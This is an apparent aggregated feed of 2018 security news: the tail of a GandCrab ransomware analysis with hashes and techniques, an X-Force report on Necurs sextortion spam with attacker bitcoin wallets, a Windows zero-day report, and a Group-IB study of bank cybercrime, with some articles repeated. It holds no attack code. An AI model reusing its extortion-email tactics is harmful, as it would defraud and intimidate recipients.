The name of the wallpaper and special strings.

Finally, the wallpaper is set for any user other than SYSTEM:

Changing the wallpaper.

The malware detects the language of the system and decrypts the strings and writes the correct ransom note in the language of the system.

Coverage

Customers of McAfee gateway and endpoint products are protected against the latest GandCrab versions. Detection names include Ran-Gandcrabv4! and many others.

An independent researcher, Twitter user Valthek, has also created several vaccines. (McAfee has verified that these vaccines are effective.) The version for GandCrab 4.x through 5.0.2 can prevent the files from being encrypted.

For Version 4.x, the deletion of shadow volumes cannot be avoided but at least the files themselves are kept safe.

For Version 5.x, encrypting the files can be avoided but not the creation and changing of the wallpaper, which the malware will still corrupt. The malware cannot create random extensions to encrypt the files but will prepare the string. Running the vaccine a second time removes the wallpaper if it is in the %TEMP% folder.

The vaccine has versions with and without persistence. The version with persistence creates a random filename in a special folder and writes a special random entry in the registry to run each time with the system. In this case, the machine will always be protected against this malware (at least in its current state of October 10, and perhaps in the future).

 

Indicators of compromise

These samples use the following MITRE ATT&CK™ techniques:

  • File deletion
  • System information discovery
  • Execution through API
  • Execution through WMIC
  • Application process discovery: to detect antimalware and security products as well as normal programs
  • Query registry: to get information about keys that the malware needs to create or read
  • Modify registry
  • File and directory discovery: to search for files to encrypt
  • Discovery of network shares to encrypt them
  • Encrypt files
  • Process discovery: enumerating all processes on the endpoint to kill some special ones
  • Create files
  • Elevation of privileges
  • Change wallpaper
  • Flood the network with connections
  • Create mutants

Hashes 

  • e168e9e0f4f631bafc47ddf23c9848d7: Version 5.0
  • 6884e3541834cc5310a3733f44b38910: Version 5.0 DLL
  • 2d351d67eab01124b7189c02cff7595f: Version 5.0.2
  • 41c673415dabbfa63905ff273bdc34e9: Version 5.0.2
  • 1e8226f7b587d6cd7017f789a96c4a65: DLL for 32-bit exploit
  • fb25dfd638b1b3ca042a9902902a5ff9: DLL for 64-bit exploit
  • df1a09dd1cc2f303a8b3d5097e53400b: botnet related to the malware (IP 92.63.197.48)

 

The post Rapidly Evolving Ransomware GandCrab Version 5 Partners With Crypter Service for Obfuscation appeared first on McAfee Blogs.

The Many Faces of Necurs: How the Botnet Spewed Millions of Spam Emails for Cyber Extortion

The Necurs botnet, a large and well-known spam originator, has become synonymous with cybercrime. Its spam-sending capabilities, through a botnet of a few million infected devices, are frequently dedicated to vast campaigns that deliver banking malware, cryptojacking malware, ransomware and a variety of email scams sent to millions of recipients in each run.

IBM X-Force monitors Necurs activity and recently discovered yet another face of this malspam volcano. This time, Necurs is spewing geotargeted emails designed to threaten and extort payment from those who may have been watching adult movies or possibly having an extramarital affair.

Of course, this spam campaign is yet another a wide-cast net from Necurs, and the attackers have no idea whether the person they reached actually does any of these activities, but the odds appear to pay off anyway. Like other phishing and social engineering scams, it is often a numbers game.

Over 30,000 IPs Spewing an Extortion Scam

In Necurs spam campaigns that started around mid-September, X-Force detected millions of emails sent to recipients in different countries, essentially from the same set of malicious IPs and with similar content.

The emails came from over 30,000 different IP addresses, 70 percent of which were dynamic IPs. The attackers demanded that victims pay in bitcoin to one of more than 500 unique wallets. The campaign came in typical spikes of activity that was more marked midweek and then over the weekend.

Necurs Spam Spikes

Figure 1: Necurs botnet extortion spam — spikes recorded in September 2018 (Source: IBM X-Force)

All of Necurs’ cybercrime campaigns are linked with well-known cybercrime gangs, such as the operators of the Dridex malware, TrickBot, Locki and Monero miners, to name a few. But in this case, scammers don’t have much more than a creative email they send around and wait for the cash to come in. All they’re using here is social engineering.

Email content examined by X-Force researchers revealed a number of repeating formats in which the sender falsely claimed to have malware-based control of the recipient’s email accounts and computer. The attackers went on to allege that they had infected adult sites with tracking malware and filmed the victim through his or her webcam while watching content on a supposedly compromised site.

To keep the matter secret, the senders demanded that money be sent to them in bitcoin, asking for an amount between $250 to $550. If they were not paid, the attackers threatened to distribute the supposed video recording to the victim’s contact list, family, co-workers and friends.

In another version of the scam, the attackers claim they have knowledge about an extramarital affair the recipient is engaged in and threaten to send supposed proof of the affair to the victim’s spouse, family, friends and co-workers.

In all cases, the sender has no control of the recipient’s device or webcam, and the entire ploy is a sham. But to make the recipient believe otherwise, the spammers added a twist: the value of the “From” header field is equal to the “To” header field, which would seem to confirm that the blackmailer has access to the victim’s accounts/computer. Also, the “SMTP-From” and “SMTP-To” values are equal to the “From” value.

How Necurs Tailors Its Spam to Recipients’ Local Language

This time, unlike previous campaigns, Necurs is spreading spam in different languages. To deliver the message in the correct language, emails are sent according to the recipient’s webmail top-level domain (TLD). So if the domain is .co.uk, for example, the email will be sent in English, and if the domain in .fr, it will be sent in French.

While the campaign included versions of this scam in seven different languages, the overwhelming majority of emails were sent in German and ended up in X-Force spam honeypots when recipient email addresses had a .de or .ch TLD.

Languages touched by this campaign so far include:

  • Arabic;
  • English;
  • French;
  • German;
  • Italian;
  • Japanese; and
  • Korean.

Our researchers were somewhat surprised to see Arabic, Japanese and Korean on the list, since those languages are harder to machine-translate and are rarely targeted by international crooks.

The French email was written by someone who is likely a French speaker, and not translated online like the English version, for example. It could be indicative of some of those involved originating in Europe and possibly collaborating with counterparts in other parts of the world.

Victims Pay Up in Bits

It is unusual to be able to judge the success of a spam campaign from the outside. Security researchers rarely have access to metrics of how many people opened a malicious email, how many went to the phishing site or how many ended up paying the criminals. In this case, however, there is a way to get a general idea because the attackers used bitcoin wallet addresses.

In all, X-Force saw 500 bitcoin addresses used in this campaign; however, most emails indicated the same few wallets while others were rarely used. It was therefore possible to look up the miscreants’ financial profits via services such as BitRef that enable researchers to check bitcoin wallet balances. While we did not check every wallet, we did want to see if the attackers were getting any money.

We spot-checked the top 20 bitcoin addresses used in the campaign. As an example, one of the addresses that appeared in over 3 million email messages sent to German recipients amassed 0.52 BTC, which was equal to about $3,300 as of September 20, 2018. That wallet never got any more money and stopped receiving coins on September 19. The situation was similar for the other frequently used wallets in the campaign:

Wallet Address BTC Received Value in USD*
16yJ7MQWTFNjsSvAJJMkjPpnJbAsGLYhW7 0.52 $ 3,396.64
14dEvzyftZjrTjXaX5XXHo65C1rdsqCw1s 0.2 $ 1,306.40
1MZHWpgmUyjmExofPDCmYuVz9kmnTpu6m 0.6798768 $ 4,440.96
1KxCvtggcPd7c9UtUxYkJW2AwCQMknJkth 0.39944001 $ 2,609.14
16acVRG2RdMDSmdVuve1N1bYBFu8Rr3iii 0.51897787 $ 3,389.96
18firbfmx4KoNeM4cBhcDdXgp2Aiduo43G 0.9347217 $ 6,105.60
1CSsVgPgwTNLGgQCHRBPa7ZNH7oxK9cf2k 0.47608621 $ 3,109.80
1CXup5BRrEFuBHDeQcduCvfu3P48rXHrck 0.7268406 $ 4,747.72
1LXxZyP7CKybaXA6jELu5YJ6UQzbdZz8RP 1.02088739 $ 6,668.44
1MuQXHNBcAbYyMvMsvHfnXdymeuoLAK14Z 0.37842439 $ 2,471.87
398Qz1Autx6HJbJwvejXVhw4mXAmBW2KsW 0.15042 $ 982.54
19fbsopNBC77qYTVaX6iqg3cWZAHhxD8WC 0.33308602 $ 2,175.72
16QR5HMNvxoAT8tCFM3VxLnawYSkWujUwH 0.11703859 $ 764.50
1NpazNoJJPwVRP1ipwcqXspinJtouHfAe1 0.37208738 $ 2,430.47
12gUsSh9BU4m9ioAykSHXXZRTdEDT6tkca 0.08542991 $ 558.03
1HGenT4A43kd3rpYCTEzpWpJdxhRB2T1qN 0.15504966 $ 1,012.78
1GzLBHTSuDP5L7aCYPRFJwtqrXNdUbsFpf 0.02972966 $ 194.19
1JsMFmiAUowGhUWGfmnyfvqsWC7CLEmDWS 0.0198436 $ 129.62
1B9LFUAYAuwSrvBwCLrRQjR1iw53oG4S39 0.02250995 $ 147.03
12RZQCLuA3dFM1e5omdBAJ2Rr8LmF9acS7 0.10786085 $ 704.55
19rq65nR7FqvEgeq3r8YmHGupsUvnD3pmD 0.44241526 $ 2,889.86
19GqTJDhu7A1qg7rnK3KS7tmCkCTMTz6xD 0 $ –
19u9GzkHDJneny3GybvLW2ZKYx3tT98w24 0 $ –

*BTC to USD exchange rate on October 4, 2018.

The amount of bitcoin contained in only the 20 main wallets totals about $50,000. Some wallets are still actively receiving coins. Most wallets show some withdrawals of the coins, bringing them to zero, which means the attackers have been removing the coins to another wallet or cashing them out.

Phishing Is Phishing — Don’t Take the Bait

October is National Cyber Security Awareness Month (NCSAM) in the U.S., making it a great opportunity to remind employees, family and friends to polish up on some information security basics, especially those related to email.

Put simply, you should always avoid opening unsolicited email. This can minimize the opportunity to fall for a social engineering scam. These communications are carefully crafted to lure people to take action, especially if they trigger an emotional reaction such as fear, urgency or, in this case, embarrassment.

You should also enable email filtering on your accounts to prevent most spam from getting through. Keep your devices clear of malware, run an up-to-date antivirus program and, if ever in doubt, have them examined by a professional.

If possible, use a separate device for online banking and other activities that involve the transfer of sensitive information. In general, adult content websites are known for high traffic and therefore are often a target for cybercriminals, which helped lend this scam some added credibility.

Visit the X-Force Exchange to learn more about this campaign. For tips to keep yourself safe from online scams and malware, check out the FBI’s Internet Crime Complaint Center (IC3) and StaySafeOnline.

The post The Many Faces of Necurs: How the Botnet Spewed Millions of Spam Emails for Cyber Extortion appeared first on Security Intelligence.

CVE-2018-8453 Zero-Day flaw exploited by FruityArmor APT in attacks aimed at Middle East

A Windows zero-day flaw addressed by Microsoft with its latest Patch Tuesday updates is exploited by an APT group in attacks aimed at entities in the Middle East.

The Windows zero-day vulnerability tracked as CVE-2018-8453 is a privilege escalation flaw that was exploited by an APT group in attacks against entities in the Middle East.

The flaw, tracked as CVE-2018-8453, affects the Win32k component of Windows handles objects in memory.

The flaw was discovered by experts from Kaspersky Lab could be exploited by an authenticated attacker to take control of an affected system.

CVE-2018-8453 Win 0day

Kaspersky Lab reported the vulnerability to Microsoft on August 17, roughly two months ago.

Kaspersky revealed that the CVE-2018-8453 vulnerability has been exploited by the APT group tracked as FruityArmor, a cyber-espionage group that was first observed in 2016 while targeting activists, researchers, and individuals related to government organizations.

Experts believe FruityArmor´s activity has been slowly increasing during the last two years.

The zero-day exploit was included by malware installer used by the group to escalate privileges on the target machine and to gain persistence.

The final payload dropped by the malware was a sophisticated implant used by the attackers for persistent access to the victims’ machines.”

“In August 2018 our Automatic Exploit Prevention (AEP) systems detected an attempt to exploit a vulnerability in Microsoft Windows operating system. Further analysis into this case led us to uncover a zero-day vulnerability in win32k.sys.” reads the report published by Kaspersky.

“The exploit was executed by the first stage of a malware installer to get necessary privileges for persistence on the victim’s system. The code of the exploit is of high quality and written with the aim of reliably exploiting as many different MS Windows builds as possible, including MS Windows 10 RS4.”

The zero-day resembles an older vulnerability tracked as CVE-2017-0263 that was fixed by Microsoft in May 2017 and that it had been exploited by the Russia-linked cyberespionage group tracked as APT28.

The zero-day exploit was used in targeted attacks against less than a dozen entities located in the Middle East.

“So far, this campaign has been extremely targeted, affecting a very low number of victims in the Middle East region, probably persons of interest for the attackers. However, the victimology is not clear, especially with such a small number of victims involved.” continues the report.

The attribution was possible due to the detection of a PowerShell backdoor that has previously been exclusively used by the FruityArmor APT. Experts also confirmed an overlap in the C2 infrastructure between the last campaign and previous attacks attributed to the group.

Further technical details are reported by Kaspersky experts in their analysis.

Pierluigi Paganini

(Security Affairs – FruityArmor, CVE-2018-8453)

The post CVE-2018-8453 Zero-Day flaw exploited by FruityArmor APT in attacks aimed at Middle East appeared first on Security Affairs.

Security Affairs: CVE-2018-8453 Zero-Day flaw exploited by FruityArmor APT in attacks aimed at Middle East

A Windows zero-day flaw addressed by Microsoft with its latest Patch Tuesday updates is exploited by an APT group in attacks aimed at entities in the Middle East.

The Windows zero-day vulnerability tracked as CVE-2018-8453 is a privilege escalation flaw that was exploited by an APT group in attacks against entities in the Middle East.

The flaw, tracked as CVE-2018-8453, affects the Win32k component of Windows handles objects in memory.

The flaw was discovered by experts from Kaspersky Lab could be exploited by an authenticated attacker to take control of an affected system.

CVE-2018-8453 Win 0day

Kaspersky Lab reported the vulnerability to Microsoft on August 17, roughly two months ago.

Kaspersky revealed that the CVE-2018-8453 vulnerability has been exploited by the APT group tracked as FruityArmor, a cyber-espionage group that was first observed in 2016 while targeting activists, researchers, and individuals related to government organizations.

Experts believe FruityArmor´s activity has been slowly increasing during the last two years.

The zero-day exploit was included by malware installer used by the group to escalate privileges on the target machine and to gain persistence.

The final payload dropped by the malware was a sophisticated implant used by the attackers for persistent access to the victims’ machines.”

“In August 2018 our Automatic Exploit Prevention (AEP) systems detected an attempt to exploit a vulnerability in Microsoft Windows operating system. Further analysis into this case led us to uncover a zero-day vulnerability in win32k.sys.” reads the report published by Kaspersky.

“The exploit was executed by the first stage of a malware installer to get necessary privileges for persistence on the victim’s system. The code of the exploit is of high quality and written with the aim of reliably exploiting as many different MS Windows builds as possible, including MS Windows 10 RS4.”

The zero-day resembles an older vulnerability tracked as CVE-2017-0263 that was fixed by Microsoft in May 2017 and that it had been exploited by the Russia-linked cyberespionage group tracked as APT28.

The zero-day exploit was used in targeted attacks against less than a dozen entities located in the Middle East.

“So far, this campaign has been extremely targeted, affecting a very low number of victims in the Middle East region, probably persons of interest for the attackers. However, the victimology is not clear, especially with such a small number of victims involved.” continues the report.

The attribution was possible due to the detection of a PowerShell backdoor that has previously been exclusively used by the FruityArmor APT. Experts also confirmed an overlap in the C2 infrastructure between the last campaign and previous attacks attributed to the group.

Further technical details are reported by Kaspersky experts in their analysis.

Pierluigi Paganini

(Security Affairs – FruityArmor, CVE-2018-8453)

The post CVE-2018-8453 Zero-Day flaw exploited by FruityArmor APT in attacks aimed at Middle East appeared first on Security Affairs.



Security Affairs

Shocking: Hackers using Googlebots in cryptomining malware attacks

By Waqas

Hackers are abusing Googlebot servers to deliver malicious payloads. Last year, HackRead exclusively reported on how hackers were using Google Adwords and Google Sites to spread malware. Then came another shocking research from Cisco Talos exposing how hackers exploited Google Search Results to distribute Zeus Panda banking trojan. Now, researchers at F5 identified a strange and infrequent behavior […]

This is a post from HackRead.com Read the original post: Shocking: Hackers using Googlebots in cryptomining malware attacks

Blog | Avast EN: Avast pumps protection, performance, and privacy in 2019 | Avast

The tech world evolves. The ones who wear black hats get smarter, and the ones who wear white hats get even smarter. Using AI, machine learning, and the big data of our vast network, we’re proud to be forerunners in the latter category, staying a step ahead of the cybercrime underworld. We not only test our products rigorously in our own labs, but we submit them for objective third-party evaluations to learn where we can improve. Reviews have been favorable throughout 2018 and we continue to offer the best free and most competitive and feature rich antivirus products on the market.

Avast-av-test-top-product-awardAvast Free Antivirus 2018 for Windows received Top Product from AV-Test.  The Avast 2019 product line-up adds on more features.



Blog | Avast EN

Group-IB: $49.4 million of damage caused to Russia’s financial sector from cyber attacks

Security firm Group-IB has estimated that in H2 2017-H1 2018 cyber attacks caused $49.4 million (2.96 billion rubles) of damage to Russia’s financial sector

Group-IB, an international company that specializes in preventing cyber attacks, has estimated that in H2 2017-H1 2018 cyber attacks caused $49.4 million (2.96 billion rubles) of damage to Russia’s financial sector. As stated in Group-IB’s annual report “Hi-Tech Crime Trends 2018” presented at the CyberCrimeCon18 conference, every month, 1-2 banks lose money as a result of cyber attacks, and the damage caused by one successful theft is, on average, $2 million.

“Financial motivation still prevails among APT-groups, however stolen money — is not the most dangerous thing that could happen to a financial organization”, — says Ilya Sachkov, Group-IB CEO and founder.  “Since in many countries banks are considered critical infrastructure, they are the targets for state-sponsored hacker groups, specialized in sabotage. One successful attack is capable of destroying one   financial organization and even the collapse of a state financial system. Considering this, banks need to rethink their approach to protection against cyber threats. Defense is an outdated strategy. It’s time to stop being victims and become hunters.”

financial sector Russia attacks

In the new report, Group-IB experts described in detail the cyber threats to the financial sector—active APT groups, tactics of the attackers, infection vectors, and new hacker tools.

Targeted attacks on banks:

Active groups and withdrawal methods

Group-IB identifies 4 criminal APT groups that pose a real threat to the financial sector: not only are they able to penetrate a bank’s network and access isolated financial systems, but they can also successfully withdraw money via SWIFT, AWS CBR, card processing and ATMs. These groups are Cobalt, MoneyTaker, Silence, which are led by Russian-speaking hackers, and the North Korean group Lazarus.

Only two criminal groups pose a threat to the SWIFT interbank transfer system: Lazarus and Cobalt, the latter of which, at the end of 2017, conducted the first successful attack in the history of Russia’s financial sector on a bank using SWIFT. According to Group-IB estimates, the number of targeted attacks on banks to conduct thefts via SWIFT in the reporting period increased threefold. In the previous period, three such attacks were recorded: in Hong Kong, Ukraine, and Turkey. In this period, however, there have already been 9 successful attacks in Nepal, Taiwan, Russia, Mexico, India, Bulgaria, and Chile. The good news is that with SWIFT most of the unauthorized transfers can be stopped in time and returned to the banks affected.

Attacks on card processing remain one of the main methods of theft and they are actively used by hackers from Cobalt, MoneyTaker, and Silence. In February 2018, members of Silence conducted a successful attack on a bank and stole money via card processing: they managed to withdraw $522,000 (35 million rubles) from cards via the ATMs of a partner bank. Focusing attacks on ATMs and card processing led to a reduction in the average amount of damage from one attack. However, they allow attackers to conduct these attacks more securely for “drops” who cash out the stolen money. The attackers are in one country, their victim (the bank) in another, and the cashing out is done in a third country.

Withdrawing money through the AWS CBR (Automated Work Station Client of the Russian Central Bank) is actively used by MoneyTaker—in November 2017, they managed to withdraw $104,000 (7 million rubles), but in summer 2018, they successfully stole $865,000 (58 million rubles) from PIR Bank. MoneyTaker has already conducted 16 attacks in the US, 5 on banks in Russia, and 1 in the UK. In the US, the average amount of damage from one attack is $500,000. In Russia, the average amount of funds withdrawn is $1.1 million (72 million rubles). In December 2017, Group-IB published the first report on this group: “MoneyTaker: 1.5 Years of Silent Operations”.

In the designated period, only Cobalt conducted attacks on payment gateways. In 2017, they used this method to steal money from two companies, however, no attempts were made in 2018. They were helped in one of their attacks by members of the group Anunak, which had not conducted at attack of this kind since 2014. Despite the arrest of the gang’s leader in Spain in spring 2018, Cobalt continues to be one of the most active and aggressive groups, steadily attacking financial organizations in Russia and abroad 2-3 times a month.

Attacks on bank customers:

The decline of Android Trojans and the triumph of phishing

In Russia, according to Group-IB experts, there are no longer any groups left that would conduct thefts from individuals using banking Trojans for PCs. This trend aimed at reducing threats from banking Trojans for PCs has been continuing in Russia since 2012.

At present, only three criminal groups—Buhtrap2, RTM, and Toplel—steal money from the accounts of legal entities in Russia. Group-IB experts noted a change in the attackers’ tactics in the second half of 2017: the vector for the distribution of Trojans was no longer the traditional malicious campaigns or hacked popular sites, but the creation of new tailored resources for accountants and companies executives who use remote banking systems (RBSs), payment systems, or cryptocurrency wallets in their work. On the fake resources, the criminals placed code that was designed to download the Buhtrap and RTM Trojans.

Unlike in Russia, on the global stage, the cyber threat landscape has undergone far greater changes. Six new banking Trojans for PCs have emerged: IcedID, BackSwap, DanaBot, MnuBot, Osiris and Xbot. Among the new Trojans, we would like to highlight BackSwap, which initially only attacked banks in Poland, but then moved on to banks in Spain. BackSwap is interesting because it simultaneously implemented several new techniques of introducing code to automatically replace payment details. The greatest threat for bank customers still comes from criminal groups that use the Dridex, Trickbot, and Gozi Trojans.

Over the last year, Group-IB experts have noted a decline in Russia of the epidemic of infecting smartphones with Android Trojans, after several years of rapid growth. The number of daily thefts committed using Android Trojans in Russia decreased almost threefold, and the average amount of theft decreased from $164 to $104. New Android Trojans—Easy, Exobot 2.0, CryEye, Cannabis, fmif, AndyBot, Loki v2, Nero banker, Sagawa and others—that are put up for sale or hire on hacker forums are primarily intended for use outside of Russia. An exception to this is the malware Banks in Your Hand. The Trojan was disguised as a financial app intended to be used as an “aggregator” of the mobile banking systems of Russia’s leading banks. Every day, the Trojan stole between $1,500 and $7,500 from users, however in March 2018, with Group-IB’s assistance, the criminals were detained by the police. Another cause of the reduction in the damage among customers can be explained by banks and payment systems introducing technologies for early fraud detection that use behavioral analysis algorithms, allowing to detect attacks, that combine social engineering scams phishing, botnets, illegal money withdrawal networks and fraud across multiple channels and other types of banking fraud on all customer devices and platforms

There has been a significant rise in the number of crimes committed using web phishing and fake websites of banks, payment systems, telecoms operators, online stores and famous brands. Using web phishing, criminals have managed to steal $3.7 million (251 million rubles), which is 6% more than in the previous period. On average, approximately $15 are stolen in each phishing attack. According to Group-IB estimates, the number of groups that create phishing websites imitating Russian brands has increased from 15 to 26. As for global trends, as expected, the greatest amount of websites for financial phishing are registered in the USA. They account for 80% of all financial phishing sites. France is in second place, followed by Germany.

Group-IB’s CEO, Ilya Sachkov, notes that to defeat cyber crime, we need to synchronize the law at state level, hit the economic base and funding channels of criminals, and introduce a moratorium on the development and sale of digital weapons that may end up in criminal hands.

Cyber security must be a priority paradigm for people, business, and the state. It is thought that countering cyber threats is a typical competition of armor and equipment. This is why the protection paradigm itself has now changed: the main idea is to be a few steps ahead of the cyber criminals and stop crimes from happening in the first place.”

About the author Group-IB

Group-IB is one the world’s leading providers of solutions aimed at detection and prevention of cyber attacks, fraud exposure and protection of intellectual property on the Internet. GIB Threat Intelligence cyber threats data collection system has been named one of the best in class by Gartner, Forrester, and IDC.

Group-IB’s technological leadership is built on company’s fifteen years of hands-on experience in cybercrime investigations all over the world and 55 000 hours of cyber security incident response accumulated in the largest forensic laboratory in Eastern Europe and a round-the-clock centre providing a rapid response to cyber incidents—CERT-GIB.

Group-IB is a partner of INTERPOL, Europol, and a cybersecurity solutions provider, recommended by SWIFT and OSCE.

Pierluigi Paganini

(Security Affairs – financial sector, cybercrime)

The post Group-IB: $49.4 million of damage caused to Russia’s financial sector from cyber attacks appeared first on Security Affairs.

Security Affairs: Group-IB: $49.4 million of damage caused to Russia’s financial sector from cyber attacks

Security firm Group-IB has estimated that in H2 2017-H1 2018 cyber attacks caused $49.4 million (2.96 billion rubles) of damage to Russia’s financial sector

Group-IB, an international company that specializes in preventing cyber attacks, has estimated that in H2 2017-H1 2018 cyber attacks caused $49.4 million (2.96 billion rubles) of damage to Russia’s financial sector. As stated in Group-IB’s annual report “Hi-Tech Crime Trends 2018” presented at the CyberCrimeCon18 conference, every month, 1-2 banks lose money as a result of cyber attacks, and the damage caused by one successful theft is, on average, $2 million.

“Financial motivation still prevails among APT-groups, however stolen money — is not the most dangerous thing that could happen to a financial organization”, — says Ilya Sachkov, Group-IB CEO and founder.  “Since in many countries banks are considered critical infrastructure, they are the targets for state-sponsored hacker groups, specialized in sabotage. One successful attack is capable of destroying one   financial organization and even the collapse of a state financial system. Considering this, banks need to rethink their approach to protection against cyber threats. Defense is an outdated strategy. It’s time to stop being victims and become hunters.”

financial sector Russia attacks

In the new report, Group-IB experts described in detail the cyber threats to the financial sector—active APT groups, tactics of the attackers, infection vectors, and new hacker tools.

Targeted attacks on banks:

Active groups and withdrawal methods

Group-IB identifies 4 criminal APT groups that pose a real threat to the financial sector: not only are they able to penetrate a bank’s network and access isolated financial systems, but they can also successfully withdraw money via SWIFT, AWS CBR, card processing and ATMs. These groups are Cobalt, MoneyTaker, Silence, which are led by Russian-speaking hackers, and the North Korean group Lazarus.

Only two criminal groups pose a threat to the SWIFT interbank transfer system: Lazarus and Cobalt, the latter of which, at the end of 2017, conducted the first successful attack in the history of Russia’s financial sector on a bank using SWIFT. According to Group-IB estimates, the number of targeted attacks on banks to conduct thefts via SWIFT in the reporting period increased threefold. In the previous period, three such attacks were recorded: in Hong Kong, Ukraine, and Turkey. In this period, however, there have already been 9 successful attacks in Nepal, Taiwan, Russia, Mexico, India, Bulgaria, and Chile. The good news is that with SWIFT most of the unauthorized transfers can be stopped in time and returned to the banks affected.

Attacks on card processing remain one of the main methods of theft and they are actively used by hackers from Cobalt, MoneyTaker, and Silence. In February 2018, members of Silence conducted a successful attack on a bank and stole money via card processing: they managed to withdraw $522,000 (35 million rubles) from cards via the ATMs of a partner bank. Focusing attacks on ATMs and card processing led to a reduction in the average amount of damage from one attack. However, they allow attackers to conduct these attacks more securely for “drops” who cash out the stolen money. The attackers are in one country, their victim (the bank) in another, and the cashing out is done in a third country.

Withdrawing money through the AWS CBR (Automated Work Station Client of the Russian Central Bank) is actively used by MoneyTaker—in November 2017, they managed to withdraw $104,000 (7 million rubles), but in summer 2018, they successfully stole $865,000 (58 million rubles) from PIR Bank. MoneyTaker has already conducted 16 attacks in the US, 5 on banks in Russia, and 1 in the UK. In the US, the average amount of damage from one attack is $500,000. In Russia, the average amount of funds withdrawn is $1.1 million (72 million rubles). In December 2017, Group-IB published the first report on this group: “MoneyTaker: 1.5 Years of Silent Operations”.

In the designated period, only Cobalt conducted attacks on payment gateways. In 2017, they used this method to steal money from two companies, however, no attempts were made in 2018. They were helped in one of their attacks by members of the group Anunak, which had not conducted at attack of this kind since 2014. Despite the arrest of the gang’s leader in Spain in spring 2018, Cobalt continues to be one of the most active and aggressive groups, steadily attacking financial organizations in Russia and abroad 2-3 times a month.

Attacks on bank customers:

The decline of Android Trojans and the triumph of phishing

In Russia, according to Group-IB experts, there are no longer any groups left that would conduct thefts from individuals using banking Trojans for PCs. This trend aimed at reducing threats from banking Trojans for PCs has been continuing in Russia since 2012.

At present, only three criminal groups—Buhtrap2, RTM, and Toplel—steal money from the accounts of legal entities in Russia. Group-IB experts noted a change in the attackers’ tactics in the second half of 2017: the vector for the distribution of Trojans was no longer the traditional malicious campaigns or hacked popular sites, but the creation of new tailored resources for accountants and companies executives who use remote banking systems (RBSs), payment systems, or cryptocurrency wallets in their work. On the fake resources, the criminals placed code that was designed to download the Buhtrap and RTM Trojans.

Unlike in Russia, on the global stage, the cyber threat landscape has undergone far greater changes. Six new banking Trojans for PCs have emerged: IcedID, BackSwap, DanaBot, MnuBot, Osiris and Xbot. Among the new Trojans, we would like to highlight BackSwap, which initially only attacked banks in Poland, but then moved on to banks in Spain. BackSwap is interesting because it simultaneously implemented several new techniques of introducing code to automatically replace payment details. The greatest threat for bank customers still comes from criminal groups that use the Dridex, Trickbot, and Gozi Trojans.

Over the last year, Group-IB experts have noted a decline in Russia of the epidemic of infecting smartphones with Android Trojans, after several years of rapid growth. The number of daily thefts committed using Android Trojans in Russia decreased almost threefold, and the average amount of theft decreased from $164 to $104. New Android Trojans—Easy, Exobot 2.0, CryEye, Cannabis, fmif, AndyBot, Loki v2, Nero banker, Sagawa and others—that are put up for sale or hire on hacker forums are primarily intended for use outside of Russia. An exception to this is the malware Banks in Your Hand. The Trojan was disguised as a financial app intended to be used as an “aggregator” of the mobile banking systems of Russia’s leading banks. Every day, the Trojan stole between $1,500 and $7,500 from users, however in March 2018, with Group-IB’s assistance, the criminals were detained by the police. Another cause of the reduction in the damage among customers can be explained by banks and payment systems introducing technologies for early fraud detection that use behavioral analysis algorithms, allowing to detect attacks, that combine social engineering scams phishing, botnets, illegal money withdrawal networks and fraud across multiple channels and other types of banking fraud on all customer devices and platforms

There has been a significant rise in the number of crimes committed using web phishing and fake websites of banks, payment systems, telecoms operators, online stores and famous brands. Using web phishing, criminals have managed to steal $3.7 million (251 million rubles), which is 6% more than in the previous period. On average, approximately $15 are stolen in each phishing attack. According to Group-IB estimates, the number of groups that create phishing websites imitating Russian brands has increased from 15 to 26. As for global trends, as expected, the greatest amount of websites for financial phishing are registered in the USA. They account for 80% of all financial phishing sites. France is in second place, followed by Germany.

Group-IB’s CEO, Ilya Sachkov, notes that to defeat cyber crime, we need to synchronize the law at state level, hit the economic base and funding channels of criminals, and introduce a moratorium on the development and sale of digital weapons that may end up in criminal hands.

Cyber security must be a priority paradigm for people, business, and the state. It is thought that countering cyber threats is a typical competition of armor and equipment. This is why the protection paradigm itself has now changed: the main idea is to be a few steps ahead of the cyber criminals and stop crimes from happening in the first place.”

About the author Group-IB

Group-IB is one the world’s leading providers of solutions aimed at detection and prevention of cyber attacks, fraud exposure and protection of intellectual property on the Internet. GIB Threat Intelligence cyber threats data collection system has been named one of the best in class by Gartner, Forrester, and IDC.

Group-IB’s technological leadership is built on company’s fifteen years of hands-on experience in cybercrime investigations all over the world and 55 000 hours of cyber security incident response accumulated in the largest forensic laboratory in Eastern Europe and a round-the-clock centre providing a rapid response to cyber incidents—CERT-GIB.

Group-IB is a partner of INTERPOL, Europol, and a cybersecurity solutions provider, recommended by SWIFT and OSCE.

Pierluigi Paganini

(Security Affairs – financial sector, cybercrime)

The post Group-IB: $49.4 million of damage caused to Russia’s financial sector from cyber attacks appeared first on Security Affairs.



Security Affairs

Cryptomining dethrones ransomware as top threat in 2018

Based on trends in the first half of 2018, Webroot found that cybercriminals are shifting to increasingly sophisticated and targeted means of attack while also expanding their money making endeavors, as shown by the uptick in cryptojacking and cryptomining. The current threat landscape There has been a massive shift from ransomware to cryptomining Malware in general, including ransomware and cryptomining, accounted for 52 percent of threats in the first half of 2018. Nonconsensual cryptomining (known … More

The post Cryptomining dethrones ransomware as top threat in 2018 appeared first on Help Net Security.

MikroTik router vulnerability lets hackers bypass firewall to load malware undetected

By Waqas

Tenable Research’s cybersecurity researcher has released “By The way,” which is a new PoC (proof-of-concept) RCE attack after identifying a new attack method to exploit an already discovered vulnerability in MikroTik routers. The vulnerability, identified as CVE-2018-14847, is an old directory traversal flaw, which was patched the same day it was detected in April, 2018. […]

This is a post from HackRead.com Read the original post: MikroTik router vulnerability lets hackers bypass firewall to load malware undetected

Threat Actors Use Delphi Packer to Shield Binaries From Malware Classification

Threat actors are increasingly using a Delphi packer to shield their binaries from malware classification by antivirus software and other security solutions.

FireEye analyzed several samples carrying the “BobSoft Mini Delphi” signature and determined that the samples were consistent with Delphi code constructs. These findings revealed that the malware binaries had been packed using a Delphi packer.

The enterprise security firm observed the packed samples being dropped in various spam campaigns. One operation used an attached document with malicious macros to download the malware. Another leveraged a document that exploited an equation editor vulnerability to deploy its packed payload.

In its analysis, FireEye came across at least eight malware families using the Delphi packer for their campaigns. Lokibot was by far the most prominent, followed by the Pony downloader and NanoCore. Researchers also spotted a cryptomining threat called CoinMiner using the packer.

How Do Malicious Actors Avoid Malware Classification?

